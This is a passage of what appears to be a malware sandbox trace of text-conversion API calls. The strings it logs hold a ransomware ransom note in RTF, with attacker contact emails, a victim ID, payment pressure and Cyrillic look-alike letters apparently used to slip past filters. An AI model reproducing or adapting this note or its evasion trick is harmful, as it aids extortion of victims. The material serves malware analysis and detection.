Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf 